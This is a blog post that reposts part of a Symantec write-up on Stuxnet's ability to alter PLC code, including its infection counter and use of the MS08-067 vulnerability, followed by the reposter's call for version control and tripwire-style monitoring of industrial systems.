By writing code to the PLC, Stuxnet can potentially control or alter how the system operates. A previous historic example includes a reported case of stolen code that impacted a pipeline. Code was secretly “Trojanized” to function properly and only some time after installation instruct the host system to increase the pipeline's pressure beyond its capacity. This resulted in a three kiloton explosion, about 1/5 the size of the Hiroshima bomb.

Thus, in addition to cleaning up the Stuxnet malware, administrators with machines infected with Stuxnet need to audit for unexpected code in their PLC devices. We are still examining some of the code blocks to determine exactly what they do and will have more information soon on how Stuxnet impacts real-world industrial control systems.

Finally, we’ve reserved the in-depth technical details on how Stuxnet achieves this rootkit functionality for a future technical whitepaper, which will delve into other features of Stuxnet as well that we haven’t had a chance to blog about. For example, a couple of other interesting things include the fact that it uses an infection counter before deleting itself (it is set to ‘3’) and also can use MS08-067, the same vulnerability used by Downadup (a.k.a. Conficker) to spread.

So, please stay tuned.
http://www.symantec.com/connect/blogs/stuxnet-introduces-...

This will be a must-read report that will make waves and may be the first step towards making version control and tripwire-like monitoring an integrated part of infrastructure and applications.

Sorry for copying, but this post is so well written, and you should read it now and not later when you have time, that I have copied it in its entirety. I do this very, very seldom and only because of the enormous importance of what has been discovered.

Did somebody say something about holidays? Maybe all those hackers and malware makers were bored.....
